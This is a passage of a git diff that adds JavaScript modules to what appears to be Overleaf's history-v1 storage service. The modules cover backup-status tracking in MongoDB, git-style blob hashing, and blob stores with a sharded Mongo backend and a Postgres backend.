+ chunksRecordsToVerify: chunksRecordsToVerify.map(c => c.chunkId), + }, + 'chunks contain no blobs to verify' + ) + return + } + await verifyBlobs(historyId, blobsToVerify, projectCache) +} + +export class BackupCorruptedError extends OError {} +export class BackupRPOViolationError extends OError {} +export class BackupCorruptedMissingBlobError extends BackupCorruptedError {} +export class BackupCorruptedInvalidBlobError extends BackupCorruptedError {} +export class BackupRPOViolationChunkNotBackedUpError extends OError {} diff --git a/services/history-v1/storage/lib/backup_store/index.js b/services/history-v1/storage/lib/backup_store/index.js new file mode 100644 index 0000000..da79447 --- /dev/null +++ b/services/history-v1/storage/lib/backup_store/index.js @@ -0,0 +1,212 @@ +const { Binary, ObjectId } = require('mongodb') +const { projects, backedUpBlobs } = require('../mongodb') +const OError = require('@overleaf/o-error') + +// List projects with pending backups older than the specified interval +function listPendingBackups(timeIntervalMs = 0, limit = null) { + const cutoffTime = new Date(Date.now() - timeIntervalMs) + const options = { + projection: { 'overleaf.backup.pendingChangeAt': 1 }, + sort: { 'overleaf.backup.pendingChangeAt': 1 }, + } + + // Apply limit if provided + if (limit) { + options.limit = limit + } + + const cursor = projects.find( + { + 'overleaf.backup.pendingChangeAt': { + $exists: true, + $lt: cutoffTime, + }, + }, + options + ) + return cursor +} + +// List projects that have never been backed up and are older than the specified interval +function listUninitializedBackups(timeIntervalMs = 0, limit = null) { + const cutoffTimeInSeconds = (Date.now() - timeIntervalMs) / 1000 + const options = { + projection: { _id: 1 }, + sort: { _id: 1 }, + } + // Apply limit if provided + if (limit) { + options.limit = limit + } + const cursor = projects.find( + { + 'overleaf.backup.lastBackedUpVersion': null, + _id: { + $lt: ObjectId.createFromTime(cutoffTimeInSeconds), + }, + }, + options + ) + return cursor +} + +// Retrieve the history ID for a given project without giving direct access to the +// projects collection. + +async function getHistoryId(projectId) { + const project = await projects.findOne( + { _id: new ObjectId(projectId) }, + { + projection: { + 'overleaf.history.id': 1, + }, + } + ) + if (!project) { + throw new Error('Project not found') + } + return project.overleaf.history.id +} + +async function getBackupStatus(projectId) { + const project = await projects.findOne( + { _id: new ObjectId(projectId) }, + { + projection: { + 'overleaf.history': 1, + 'overleaf.backup': 1, + }, + } + ) + if (!project) { + throw new Error('Project not found') + } + return { + backupStatus: project.overleaf.backup, + historyId: `${project.overleaf.history.id}`, + currentEndVersion: project.overleaf.history.currentEndVersion, + currentEndTimestamp: project.overleaf.history.currentEndTimestamp, + } +} + +async function setBackupVersion( + projectId, + previousBackedUpVersion, + currentBackedUpVersion, + currentBackedUpAt +) { + // FIXME: include a check to handle race conditions + // to make sure only one process updates the version numbers + const result = await projects.updateOne( + { + _id: new ObjectId(projectId), + 'overleaf.backup.lastBackedUpVersion': previousBackedUpVersion, + }, + { + $set: { + 'overleaf.backup.lastBackedUpVersion': currentBackedUpVersion, + 'overleaf.backup.lastBackedUpAt': currentBackedUpAt, + }, + } + ) + if (result.matchedCount === 0 || result.modifiedCount === 0) { + throw new OError('Failed to update backup version', { + previousBackedUpVersion, + currentBackedUpVersion, + currentBackedUpAt, + result, + }) + } +} + +async function updateCurrentMetadataIfNotSet(projectId, latestChunkMetadata) { + await projects.updateOne( + { + _id: new ObjectId(projectId), + 'overleaf.history.currentEndVersion': { $exists: false }, + 'overleaf.history.currentEndTimestamp': { $exists: false }, + }, + { + $set: { + 'overleaf.history.currentEndVersion': latestChunkMetadata.endVersion, + 'overleaf.history.currentEndTimestamp': + latestChunkMetadata.endTimestamp, + }, + } + ) +} + +/** + * Updates the pending change timestamp for a project's backup status + * @param {string} projectId - The ID of the project to update + * @param {Date} backupStartTime - The timestamp to set for pending changes + * @returns {Promise<void>} + * + * If the project's last backed up version matches the current end version, + * the pending change timestamp is removed. Otherwise, it's set to the provided + * backup start time. + */ +async function updatePendingChangeTimestamp(projectId, backupStartTime) { + await projects.updateOne({ _id: new ObjectId(projectId) }, [ + { + $set: { + 'overleaf.backup.pendingChangeAt': { + $cond: { + if: { + $eq: [ + '$overleaf.backup.lastBackedUpVersion', + '$overleaf.history.currentEndVersion', + ], + }, + then: '$$REMOVE', + else: backupStartTime, + }, + }, + }, + }, + ]) +} + +async function getBackedUpBlobHashes(projectId) { + const result = await backedUpBlobs.findOne( + { _id: new ObjectId(projectId) }, + { projection: { blobs: 1 } } + ) + if (!result) { + return new Set() + } + const hashes = result.blobs.map(b => b.buffer.toString('hex')) + return new Set(hashes) +} + +async function unsetBackedUpBlobHashes(projectId, hashes) { + const binaryHashes = hashes.map(h => new Binary(Buffer.from(h, 'hex'))) + const result = await backedUpBlobs.findOneAndUpdate( + { _id: new ObjectId(projectId) }, + { + $pullAll: { + blobs: binaryHashes, + }, + }, + { returnDocument: 'after' } + ) + if (result && result.blobs.length === 0) { + await backedUpBlobs.deleteOne({ + _id: new ObjectId(projectId), + blobs: { $size: 0 }, + }) + } + return result +} + +module.exports = { + getHistoryId, + getBackupStatus, + setBackupVersion, + updateCurrentMetadataIfNotSet, + updatePendingChangeTimestamp, + listPendingBackups, + listUninitializedBackups, + getBackedUpBlobHashes, + unsetBackedUpBlobHashes, +} diff --git a/services/history-v1/storage/lib/batch_blob_store.js b/services/history-v1/storage/lib/batch_blob_store.js new file mode 100644 index 0000000..af90b2e --- /dev/null +++ b/services/history-v1/storage/lib/batch_blob_store.js @@ -0,0 +1,40 @@ +'use strict' + +const BPromise = require('bluebird') + +/** + * @constructor + * @param {BlobStore} blobStore + * @classdesc + * Wrapper for BlobStore that pre-fetches blob metadata to avoid making one + * database call per blob lookup. + */ +function BatchBlobStore(blobStore) { + this.blobStore = blobStore + this.blobs = new Map() +} + +/** + * Pre-fetch metadata for the given blob hashes. + * + * @param {Array.<string>} hashes + * @return {Promise} + */ +BatchBlobStore.prototype.preload = function batchBlobStorePreload(hashes) { + return BPromise.each(this.blobStore.getBlobs(hashes), blob => { + this.blobs.set(blob.getHash(), blob) + }) +} + +/** + * @see BlobStore#getBlob + */ +BatchBlobStore.prototype.getBlob = BPromise.method( + function batchBlobStoreGetBlob(hash) { + const blob = this.blobs.get(hash) + if (blob) return blob + return this.blobStore.getBlob(hash) + } +) + +module.exports = BatchBlobStore diff --git a/services/history-v1/storage/lib/blob_hash.js b/services/history-v1/storage/lib/blob_hash.js new file mode 100644 index 0000000..6309637 --- /dev/null +++ b/services/history-v1/storage/lib/blob_hash.js @@ -0,0 +1,80 @@ +/** @module */ +'use strict' + +const BPromise = require('bluebird') +const fs = BPromise.promisifyAll(require('node:fs')) +const crypto = require('node:crypto') +const { pipeline } = require('node:stream') +const assert = require('./assert') + +function getGitBlobHeader(byteLength) { + return 'blob ' + byteLength + '\x00' +} + +function getBlobHash(byteLength) { + const hash = crypto.createHash('sha1') + hash.setEncoding('hex') + hash.update(getGitBlobHeader(byteLength)) + return hash +} + +/** + * Compute the git blob hash for a blob from a readable stream of its content. + * + * @function + * @param {number} byteLength + * @param {stream.Readable} stream + * @return {Promise.<string>} hexadecimal SHA-1 hash + */ +exports.fromStream = BPromise.method( + function blobHashFromStream(byteLength, stream) { + assert.integer(byteLength, 'blobHash: bad byteLength') + assert.object(stream, 'blobHash: bad stream') + + const hash = getBlobHash(byteLength) + return new BPromise(function (resolve, reject) { + pipeline(stream, hash, function (err) { + if (err) { + reject(err) + } else { + hash.end() + resolve(hash.read()) + } + }) + }) + } +) + +/** + * Compute the git blob hash for a blob with the given string content. + * + * @param {string} string + * @return {string} hexadecimal SHA-1 hash + */ +exports.fromString = function blobHashFromString(string) { + assert.string(string, 'blobHash: bad string') + const hash = getBlobHash(Buffer.byteLength(string)) + hash.update(string, 'utf8') + hash.end() + return hash.read() +} + +/** + * Compute the git blob hash for the content of a file + * + * @param {string} filePath + * @return {string} hexadecimal SHA-1 hash + */ +exports.fromFile = function blobHashFromFile(pathname) { + assert.string(pathname, 'blobHash: bad pathname') + + function getByteLengthOfFile() { + return fs.statAsync(pathname).then(stat => stat.size) + } + + const fromStream = this.fromStream + return getByteLengthOfFile(pathname).then(function (byteLength) { + const stream = fs.createReadStream(pathname) + return fromStream(byteLength, stream) + }) +} diff --git a/services/history-v1/storage/lib/blob_store/index.js b/services/history-v1/storage/lib/blob_store/index.js new file mode 100644 index 0000000..b4a7d16 --- /dev/null +++ b/services/history-v1/storage/lib/blob_store/index.js @@ -0,0 +1,433 @@ +'use strict' + +const config = require('config') +const fs = require('node:fs') +const isValidUtf8 = require('utf-8-validate') +const { ReadableString } = require('@overleaf/stream-utils') + +const core = require('overleaf-editor-core') +const objectPersistor = require('@overleaf/object-persistor') +const OError = require('@overleaf/o-error') +const Blob = core.Blob +const TextOperation = core.TextOperation +const containsNonBmpChars = core.util.containsNonBmpChars + +const assert = require('../assert') +const blobHash = require('../blob_hash') +const mongodb = require('../mongodb') +const persistor = require('../persistor') +const projectKey = require('../project_key') +const streams = require('../streams') +const postgresBackend = require('./postgres') +const mongoBackend = require('./mongo') +const logger = require('@overleaf/logger') + +/** @import { Readable } from 'stream' */ + +const GLOBAL_BLOBS = new Map() + +function makeGlobalKey(hash) { + return `${hash.slice(0, 2)}/${hash.slice(2, 4)}/${hash.slice(4)}` +} + +function makeProjectKey(projectId, hash) { + return `${projectKey.format(projectId)}/${hash.slice(0, 2)}/${hash.slice(2)}` +} + +async function uploadBlob(projectId, blob, stream, opts = {}) { + const bucket = config.get('blobStore.projectBucket') + const key = makeProjectKey(projectId, blob.getHash()) + logger.debug({ projectId, blob }, 'uploadBlob started') + try { + await persistor.sendStream(bucket, key, stream, { + contentType: 'application/octet-stream', + ...opts, + }) + } finally { + logger.debug({ projectId, blob }, 'uploadBlob finished') + } +} + +function getBlobLocation(projectId, hash) { + if (GLOBAL_BLOBS.has(hash)) { + return { + bucket: config.get('blobStore.globalBucket'), + key: makeGlobalKey(hash), + } + } else { + return { + bucket: config.get('blobStore.projectBucket'), + key: makeProjectKey(projectId, hash), + } + } +} + +/** + * Returns the appropriate backend for the given project id + * + * Numeric ids use the Postgres backend. + * Strings of 24 characters use the Mongo backend. + */ +function getBackend(projectId) { + if (assert.POSTGRES_ID_REGEXP.test(projectId)) { + return postgresBackend + } else if (assert.MONGO_ID_REGEXP.test(projectId)) { + return mongoBackend + } else { + throw new OError('bad project id', { projectId }) + } +} + +async function makeBlobForFile(pathname) { + const { size: byteLength } = await fs.promises.stat(pathname) + const hash = await blobHash.fromStream( + byteLength, + fs.createReadStream(pathname) + ) + return new Blob(hash, byteLength) +} + +async function getStringLengthOfFile(byteLength, pathname) { + // We have to read the file into memory to get its UTF-8 length, so don't + // bother for files that are too large for us to edit anyway. + if (byteLength > Blob.MAX_EDITABLE_BYTE_LENGTH_BOUND) { + return null + } + + // We need to check if the file contains nonBmp or null characters + let data = await fs.promises.readFile(pathname) + if (!isValidUtf8(data)) return null + data = data.toString() + if (data.length > TextOperation.MAX_STRING_LENGTH) return null + if (containsNonBmpChars(data)) return null + if (data.indexOf('\x00') !== -1) return null + return data.length +} + +async function deleteBlobsInBucket(projectId) { + const bucket = config.get('blobStore.projectBucket') + const prefix = `${projectKey.format(projectId)}/` + logger.debug({ projectId }, 'deleteBlobsInBucket started') + try { + await persistor.deleteDirectory(bucket, prefix) + } finally { + logger.debug({ projectId }, 'deleteBlobsInBucket finished') + } +} + +async function loadGlobalBlobs() { + const blobs = await mongodb.globalBlobs.find() + for await (const blob of blobs) { + GLOBAL_BLOBS.set(blob._id, { + blob: new Blob(blob._id, blob.byteLength, blob.stringLength), + demoted: Boolean(blob.demoted), + }) + } +} + +/** + * Return metadata for all blobs in the given project + * @param {Array<string|number>} projectIds + * @return {Promise<{nBlobs:number, blobs:Map<string,Array<core.Blob>>}>} + */ +async function getProjectBlobsBatch(projectIds) { + const mongoProjects = [] + const postgresProjects = [] + for (const projectId of projectIds) { + if (typeof projectId === 'number') { + postgresProjects.push(projectId) + } else { + mongoProjects.push(projectId) + } + } + const [ + { nBlobs: nBlobsPostgres, blobs: blobsPostgres }, + { nBlobs: nBlobsMongo, blobs: blobsMongo }, + ] = await Promise.all([ + postgresBackend.getProjectBlobsBatch(postgresProjects), + mongoBackend.getProjectBlobsBatch(mongoProjects), + ]) + for (const [id, blobs] of blobsPostgres.entries()) { + blobsMongo.set(id.toString(), blobs) + } + return { nBlobs: nBlobsPostgres + nBlobsMongo, blobs: blobsMongo } +} + +/** + * @classdesc + * Fetch and store the content of files using content-addressable hashing. The + * blob store manages both content and metadata (byte and UTF-8 length) for + * blobs. + */ +class BlobStore { + /** + * @constructor + * @param {string} projectId the project for which we'd like to find blobs + */ + constructor(projectId) { + assert.projectId(projectId) + this.projectId = projectId + this.backend = getBackend(this.projectId) + } + + /** + * Set up the initial data structure for a given project + */ + async initialize() { + await this.backend.initialize(this.projectId) + } + + /** + * Write a blob, if one does not already exist, with the given UTF-8 encoded + * string content. + * + * @param {string} string + * @return {Promise.<core.Blob>} + */ + async putString(string) { + assert.string(string, 'bad string') + const hash = blobHash.fromString(string) + + const existingBlob = await this._findBlobBeforeInsert(hash) + if (existingBlob != null) { + return existingBlob + } + const newBlob = new Blob(hash, Buffer.byteLength(string), string.length) + // Note: the ReadableString is to work around a bug in the AWS SDK: it won't + // allow Body to be blank. + await uploadBlob(this.projectId, newBlob, new ReadableString(string)) + await this.backend.insertBlob(this.projectId, newBlob) + return newBlob + } + + /** + * Write a blob, if one does not already exist, with the given file (usually a + * temporary file). + * + * @param {string} pathname + * @return {Promise<core.Blob>} + */ + async putFile(pathname) { + assert.string(pathname, 'bad pathname') + const newBlob = await makeBlobForFile(pathname) + const existingBlob = await this._findBlobBeforeInsert(newBlob.getHash()) + if (existingBlob != null) { + return existingBlob + } + const stringLength = await getStringLengthOfFile( + newBlob.getByteLength(), + pathname + ) + newBlob.setStringLength(stringLength) + await this.putBlob(pathname, newBlob) + return newBlob + } + + /** + * Write a new blob, the stringLength must have been added already. It should + * have been checked that the blob does not exist yet. Consider using + * {@link putFile} instead of this lower-level method. + * + * @param {string} pathname + * @param {core.Blob} finializedBlob + * @return {Promise<void>} + */ + async putBlob(pathname, finializedBlob) { + await uploadBlob( + this.projectId, + finializedBlob, + fs.createReadStream(pathname) + ) + await this.backend.insertBlob(this.projectId, finializedBlob) + } + + /** + * Stores an object as a JSON string in a blob. + * + * @param {object} obj + * @returns {Promise.<core.Blob>} + */ + async putObject(obj) { + assert.object(obj, 'bad object') + const string = JSON.stringify(obj) + return await this.putString(string) + } + + /** + * + * Fetch a blob's content by its hash as a UTF-8 encoded string. + * + * @param {string} hash hexadecimal SHA-1 hash + * @return {Promise.<string>} promise for the content of the file + */ + async getString(hash) { + assert.blobHash(hash, 'bad hash') + + const projectId = this.projectId + logger.debug({ projectId, hash }, 'getString started') + try { + const stream = await this.getStream(hash) + const buffer = await streams.readStreamToBuffer(stream) + return buffer.toString() + } finally { + logger.debug({ projectId, hash }, 'getString finished') + } + } + + /** + * Fetch a JSON encoded blob by its hash and deserialize it. + * + * @template [T=unknown] + * @param {string} hash hexadecimal SHA-1 hash + * @return {Promise.<T>} promise for the content of the file + */ + async getObject(hash) { + assert.blobHash(hash, 'bad hash') + const projectId = this.projectId + logger.debug({ projectId, hash }, 'getObject started') + try { + const jsonString = await this.getString(hash) + const object = JSON.parse(jsonString) + return object + } catch (error) { + // Maybe this is blob is gzipped. Try to gunzip it. + // TODO: Remove once we've ensured this is not reached + const stream = await this.getStream(hash) + const buffer = await streams.gunzipStreamToBuffer(stream) + const object = JSON.parse(buffer.toString()) + logger.warn('getObject: Gzipped object in BlobStore') + return object + } finally { + logger.debug({ projectId, hash }, 'getObject finished') + } + } + + /** + * Fetch a blob by its hash as a stream. + * + * Note that, according to the AWS SDK docs, this does not retry after initial + * failure, so the caller must be prepared to retry on errors, if appropriate. + * + * @param {string} hash hexadecimal SHA-1 hash + * @param {Object} opts + * @return {Promise.<Readable>} a stream to read the file + */ + async getStream(hash, opts = {}) { + assert.blobHash(hash, 'bad hash') + + const { bucket, key } = getBlobLocation(this.projectId, hash) + try { + const stream = await persistor.getObjectStream(bucket, key, opts) + return stream + } catch (err) { + if (err instanceof objectPersistor.Errors.NotFoundError) { + throw new Blob.NotFoundError(hash) + } + throw err + } + } + + /** + * Read a blob metadata record by hexadecimal hash. + * + * @param {string} hash hexadecimal SHA-1 hash + * @return {Promise<core.Blob | null>} + */ + async getBlob(hash) { + assert.blobHash(hash, 'bad hash') + const globalBlob = GLOBAL_BLOBS.get(hash) + if (globalBlob != null) { + return globalBlob.blob + } + const blob = await this.backend.findBlob(this.projectId, hash) + return blob + } + + async getBlobs(hashes) { + assert.array(hashes, 'bad hashes') + const nonGlobalHashes = [] + const blobs = [] + for (const hash of hashes) { + const globalBlob = GLOBAL_BLOBS.get(hash) + if (globalBlob != null) { + blobs.push(globalBlob.blob) + } else { + nonGlobalHashes.push(hash) + } + } + if (nonGlobalHashes.length === 0) { + return blobs // to avoid unnecessary database lookup + } + const projectBlobs = await this.backend.findBlobs( + this.projectId, + nonGlobalHashes + ) + blobs.push(...projectBlobs) + return blobs + } + + /** + * Retrieve all blobs associated with the project. + * @returns {Promise<core.Blob[]>} A promise that resolves to an array of blobs. + */ + + async getProjectBlobs() { + const projectBlobs = await this.backend.getProjectBlobs(this.projectId) + return projectBlobs + } + + /** + * Delete all blobs that belong to the project. + */ + async deleteBlobs() { + await Promise.all([ + this.backend.deleteBlobs(this.projectId), + deleteBlobsInBucket(this.projectId), + ]) + } + + async _findBlobBeforeInsert(hash) { + const globalBlob = GLOBAL_BLOBS.get(hash) + if (globalBlob != null && !globalBlob.demoted) { + return globalBlob.blob + } + const blob = await this.backend.findBlob(this.projectId, hash) + return blob + } + + /** + * Copy an existing sourceBlob in this project to a target project. + * @param {Blob} sourceBlob + * @param {string} targetProjectId + * @return {Promise<void>} + */ + async copyBlob(sourceBlob, targetProjectId) { + assert.instance(sourceBlob, Blob, 'bad sourceBlob') + assert.projectId(targetProjectId, 'bad targetProjectId') + const hash = sourceBlob.getHash() + const sourceProjectId = this.projectId + const { bucket, key: sourceKey } = getBlobLocation(sourceProjectId, hash) + const destKey = makeProjectKey(targetProjectId, hash) + const targetBackend = getBackend(targetProjectId) + logger.debug({ sourceProjectId, targetProjectId, hash }, 'copyBlob started') + try { + await persistor.copyObject(bucket, sourceKey, destKey) + await targetBackend.insertBlob(targetProjectId, sourceBlob) + } finally { + logger.debug( + { sourceProjectId, targetProjectId, hash }, + 'copyBlob finished' + ) + } + } +} + +module.exports = { + BlobStore, + getProjectBlobsBatch, + loadGlobalBlobs, + makeProjectKey, + makeBlobForFile, + getStringLengthOfFile, + GLOBAL_BLOBS, +} diff --git a/services/history-v1/storage/lib/blob_store/mongo.js b/services/history-v1/storage/lib/blob_store/mongo.js new file mode 100644 index 0000000..9117382 --- /dev/null +++ b/services/history-v1/storage/lib/blob_store/mongo.js @@ -0,0 +1,437 @@ +// @ts-check +/** + * Mongo backend for the blob store. + * + * Blobs are stored in the projectHistoryBlobs collection. Each project has a + * document in that collection. That document has a "blobs" subdocument whose + * fields are buckets of blobs. The key of a bucket is the first three hex + * digits of the blob hash. The value of the bucket is an array of blobs that + * match the key. + * + * Buckets have a maximum capacity of 8 blobs. When that capacity is exceeded, + * blobs are stored in a secondary collection: the projectHistoryShardedBlobs + * collection. This collection shards blobs between 16 documents per project. + * The shard key is the first hex digit of the hash. The documents are also + * organized in buckets, but the bucket key is made of hex digits 2, 3 and 4. + */ + +const { Blob } = require('overleaf-editor-core') +const { ObjectId, Binary, MongoError, ReadPreference } = require('mongodb') +const assert = require('../assert') +const mongodb = require('../mongodb') + +const MAX_BLOBS_IN_BUCKET = 8 +const DUPLICATE_KEY_ERROR_CODE = 11000 + +/** + * @typedef {import('mongodb').ReadPreferenceLike} ReadPreferenceLike + */ + +/** + * Set up the data structures for a given project. + * @param {string} projectId + */ +async function initialize(projectId) { + assert.mongoId(projectId, 'bad projectId') + try { + await mongodb.blobs.insertOne({ + _id: new ObjectId(projectId), + blobs: {}, + }) + } catch (err) { + if (err instanceof MongoError && err.code === DUPLICATE_KEY_ERROR_CODE) { + return // ignore already initialized case + } + throw err + } +} + +/** + * Return blob metadata for the given project and hash. + * @param {string} projectId + * @param {string} hash + * @return {Promise<Blob | null>} + */ +async function findBlob(projectId, hash) { + assert.mongoId(projectId, 'bad projectId') + assert.blobHash(hash, 'bad hash') + + const bucket = getBucket(hash) + const result = await mongodb.blobs.findOne( + { _id: new ObjectId(projectId) }, + { projection: { _id: 0, bucket: `$${bucket}` } } + ) + + if (result?.bucket == null) { + return null + } + + const record = result.bucket.find(blob => blob.h.toString('hex') === hash) + if (record == null) { + if (result.bucket.length >= MAX_BLOBS_IN_BUCKET) { + return await findBlobSharded(projectId, hash) + } else { + return null + } + } + return recordToBlob(record) +} + +/** + * Search in the sharded collection for blob metadata + * @param {string} projectId + * @param {string} hash + * @return {Promise<Blob | null>} + */ +async function findBlobSharded(projectId, hash) { + const [shard, bucket] = getShardedBucket(hash) + const id = makeShardedId(projectId, shard) + const result = await mongodb.shardedBlobs.findOne( + { _id: id }, + { projection: { _id: 0, blobs: `$${bucket}` } } + ) + if (result?.blobs == null) { + return null + } + const record = result.blobs.find(blob => blob.h.toString('hex') === hash) + if (!record) return null + return recordToBlob(record) +} + +/** + * Read multiple blob metadata records by hexadecimal hashes. + * @param {string} projectId + * @param {Array<string>} hashes + * @return {Promise<Array<Blob>>} + */ +async function findBlobs(projectId, hashes) { + assert.mongoId(projectId, 'bad projectId') + assert.array(hashes, 'bad hashes: not array') + hashes.forEach(function (hash) { + assert.blobHash(hash, 'bad hash') + }) + + // Build a set of unique buckets + const buckets = new Set(hashes.map(getBucket)) + + // Get buckets from Mongo + const projection = { _id: 0 } + for (const bucket of buckets) { + projection[bucket] = 1 + } + const result = await mongodb.blobs.findOne( + { _id: new ObjectId(projectId) }, + { projection } + ) + + if (result?.blobs == null) { + return [] + } + + // Build blobs from the query results + const hashSet = new Set(hashes) + const blobs = [] + for (const bucket of Object.values(result.blobs)) { + for (const record of bucket) { + const hash = record.h.toString('hex') + if (hashSet.has(hash)) { + blobs.push(recordToBlob(record)) + hashSet.delete(hash) + } + } + } + + // If we haven't found all the blobs, look in the sharded collection + if (hashSet.size > 0) { + const shardedBlobs = await findBlobsSharded(projectId, hashSet) + blobs.push(...shardedBlobs) + } + + return blobs +} + +/** + * Search in the sharded collection for blob metadata. + * @param {string} projectId + * @param {Set<string>} hashSet + * @return {Promise<Array<Blob>>} + */ +async function findBlobsSharded(projectId, hashSet) { + // Build a map of buckets by shard key + const bucketsByShard = new Map() + for (const hash of hashSet) { + const [shard, bucket] = getShardedBucket(hash) + let buckets = bucketsByShard.get(shard) + if (buckets == null) { + buckets = new Set() + bucketsByShard.set(shard, buckets) + } + buckets.add(bucket) + } + + // Make parallel requests to the shards that might contain the hashes we want + const requests = [] + for (const [shard, buckets] of bucketsByShard.entries()) { + const id = makeShardedId(projectId, shard) + const projection = { _id: 0 } + for (const bucket of buckets) { + projection[bucket] = 1 + } + const request = mongodb.shardedBlobs.findOne({ _id: id }, { projection }) + requests.push(request) + } + const results = await Promise.all(requests) + + // Build blobs from the query results + const blobs = [] + for (const result of results) { + if (result?.blobs == null) { + continue + } + + for (const bucket of Object.values(result.blobs)) { + for (const record of bucket) { + const hash = record.h.toString('hex') + if (hashSet.has(hash)) { + blobs.push(recordToBlob(record)) + } + } + } + } + return blobs +} + +/** + * Return metadata for all blobs in the given project + */ +async function getProjectBlobs(projectId) { + assert.mongoId(projectId, 'bad projectId') + + const result = await mongodb.blobs.findOne( + { _id: new ObjectId(projectId) }, + { projection: { _id: 0 } } + ) + + if (!result) { + return [] + } + + // Build blobs from the query results + const blobs = [] + for (const bucket of Object.values(result.blobs)) { + for (const record of bucket) { + blobs.push(recordToBlob(record)) + } + } + + // Look for all possible sharded blobs + + const minShardedId = makeShardedId(projectId, '0') + const maxShardedId = makeShardedId(projectId, 'f') + // @ts-ignore We are using a custom _id here. + const shardedRecords = mongodb.shardedBlobs.find( + { + _id: { $gte: minShardedId, $lte: maxShardedId }, + }, + { projection: { _id: 0 } } + ) + + for await (const shardedRecord of shardedRecords) { + if (shardedRecord.blobs == null) { + continue + } + for (const bucket of Object.values(shardedRecord.blobs)) { + for (const record of bucket) { + blobs.push(recordToBlob(record)) + } + } + } + + return blobs +} + +/** + * Return metadata for all blobs in the given project + * @param {Array<string>} projectIds + * @return {Promise<{ nBlobs: number, blobs: Map<string, Array<Blob>> }>} + */ +async function getProjectBlobsBatch(projectIds) { + for (const project of projectIds) { + assert.mongoId(project, 'bad projectId') + } + let nBlobs = 0 + const blobs = new Map() + if (projectIds.length === 0) return { nBlobs, blobs } + + // blobs + { + const cursor = await mongodb.blobs.find( + { _id: { $in: projectIds.map(projectId => new ObjectId(projectId)) } }, + { readPreference: ReadPreference.secondaryPreferred } + ) + for await (const record of cursor) { + const projectBlobs = Object.values(record.blobs).flat().map(recordToBlob) + blobs.set(record._id.toString(), projectBlobs) + nBlobs += projectBlobs.length + } + } + + // sharded blobs + { + // @ts-ignore We are using a custom _id here. + const cursor = await mongodb.shardedBlobs.find( + { + _id: { + $gte: makeShardedId(projectIds[0], '0'), + $lte: makeShardedId(projectIds[projectIds.length - 1], 'f'), + }, + }, + { readPreference: ReadPreference.secondaryPreferred } + ) + for await (const record of cursor) { + const recordIdHex = record._id.toString('hex') + const recordProjectId = recordIdHex.slice(0, 24) + const projectBlobs = Object.values(record.blobs).flat().map(recordToBlob) + const found = blobs.get(recordProjectId) + if (found) { + found.push(...projectBlobs) + } else { + blobs.set(recordProjectId, projectBlobs) + } + nBlobs += projectBlobs.length + } + } + return { nBlobs, blobs } +} + +/** + * Add a blob's metadata to the blobs collection after it has been uploaded. + * @param {string} projectId + * @param {Blob} blob + */ +async function insertBlob(projectId, blob) { + assert.mongoId(projectId, 'bad projectId') + const hash = blob.getHash() + const bucket = getBucket(hash) + const record = blobToRecord(blob) + const result = await mongodb.blobs.updateOne( + { + _id: new ObjectId(projectId), + $expr: { + $lt: [{ $size: { $ifNull: [`$${bucket}`, []] } }, MAX_BLOBS_IN_BUCKET], + }, + }, + { + $addToSet: { [bucket]: record }, + } + ) + + if (result.matchedCount === 0) { + await insertRecordSharded(projectId, hash, record) + } +} + +/** + * Add a blob's metadata to the sharded blobs collection. + * @param {string} projectId + * @param {string} hash + * @param {Record} record + * @return {Promise<void>} + */ +async function insertRecordSharded(projectId, hash, record) { + const [shard, bucket] = getShardedBucket(hash) + const id = makeShardedId(projectId, shard) + await mongodb.shardedBlobs.updateOne( + { _id: id }, + { $addToSet: { [bucket]: record } }, + { upsert: true } + ) +} + +/** + * Delete all blobs for a given project. + * @param {string} projectId + */ +async function deleteBlobs(projectId) { + assert.mongoId(projectId, 'bad projectId') + await mongodb.blobs.deleteOne({ _id: new ObjectId(projectId) }) + const minShardedId = makeShardedId(projectId, '0') + const maxShardedId = makeShardedId(projectId, 'f') + await mongodb.shardedBlobs.deleteMany({ + // @ts-ignore We are using a custom _id here. + _id: { $gte: minShardedId, $lte: maxShardedId }, + }) +} + +/** + * Return the Mongo path to the bucket for the given hash. + * @param {string} hash + * @return {string} + */ +function getBucket(hash) { + return `blobs.${hash.slice(0, 3)}` +} + +/** + * Return the shard key and Mongo path to the bucket for the given hash in the + * sharded collection. + * @param {string} hash + * @return {[string, string]} + */ +function getShardedBucket(hash) { + const shard = hash.slice(0, 1) + const bucket = `blobs.${hash.slice(1, 4)}` + return [shard, bucket] +} + +/** + * Create an _id key for the sharded collection. + * @param {string} projectId + * @param {string} shard + * @return {Binary} + */ +function makeShardedId(projectId, shard) { + return new Binary(Buffer.from(`${projectId}0${shard}`, 'hex')) +} + +/** + * @typedef {Object} Record + * @property {Binary} h + * @property {number} b + * @property {number} [s] + */ + +/** + * Return the Mongo record for the given blob. + * @param {Blob} blob + * @return {Record} + */ +function blobToRecord(blob) { + const hash = blob.getHash() + const byteLength = blob.getByteLength() + const stringLength = blob.getStringLength() + return { + h: new Binary(Buffer.from(hash, 'hex')), + b: byteLength, + s: stringLength, + } +} + +/** + * Create a blob from the given Mongo record. + * @param {Record} record + * @return {Blob} + */ +function recordToBlob(record) { + return new Blob(record.h.toString('hex'), record.b, record.s) +} + +module.exports = { + initialize, + findBlob, + findBlobs, + getProjectBlobs, + getProjectBlobsBatch, + insertBlob, + deleteBlobs, +} diff --git a/services/history-v1/storage/lib/blob_store/postgres.js b/services/history-v1/storage/lib/blob_store/postgres.js new file mode 100644 index 0000000..1cedeec --- /dev/null +++ b/services/history-v1/storage/lib/blob_store/postgres.js @@ -0,0 +1,161 @@ +const { Blob } = require('overleaf-editor-core') +const assert = require('../assert') +const knex = require('../knex') + +/** + * Set up the initial data structures for a project + */ +async function initialize(projectId) { + // Nothing to do for Postgres +} + +/** + * Return blob metadata for the given project and hash + */ +async function findBlob(projectId, hash) { + assert.postgresId(projectId, 'bad projectId') + projectId = parseInt(projectId, 10) + assert.blobHash(hash, 'bad hash') + + const binaryHash = hashToBuffer(hash) + const record = await knex('project_blobs') + .select('hash_bytes', 'byte_length', 'string_length') + .where({ + project_id: projectId, + hash_bytes: binaryHash, + }) + .first() + return recordToBlob(record) +} + +/** + * Read multiple blob metadata records by hexadecimal hashes. + * + * @param {Array.<string>} hashes hexadecimal SHA-1 hashes + * @return {Promise.<Array.<Blob?>>} no guarantee on order + */ +async function findBlobs(projectId, hashes) { + assert.postgresId(projectId, 'bad projectId') + projectId = parseInt(projectId, 10) + assert.array(hashes, 'bad hashes: not array') + hashes.forEach(function (hash) { + assert.blobHash(hash, 'bad hash') + }) + + const binaryHashes = hashes.map(hashToBuffer) + + const records = await knex('project_blobs') + .select('hash_bytes', 'byte_length', 'string_length') + .where('project_id', projectId) + .whereIn('hash_bytes', 